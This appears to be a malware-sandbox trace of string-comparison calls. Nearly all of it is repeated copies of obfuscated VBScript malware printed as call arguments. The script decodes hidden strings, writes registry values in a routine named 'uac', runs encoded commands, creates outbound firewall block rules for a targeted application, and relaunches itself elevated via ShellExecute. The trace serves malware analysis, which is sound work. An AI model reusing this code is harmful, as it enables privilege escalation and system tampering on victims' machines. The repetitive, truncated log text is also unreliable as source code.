bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.309] wcsncmp (_String1=",2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.309] wcsncmp (_String1="2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.310] wcsncmp (_String1=",1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.310] wcsncmp (_String1="1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.310] wcsncmp (_String1="))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 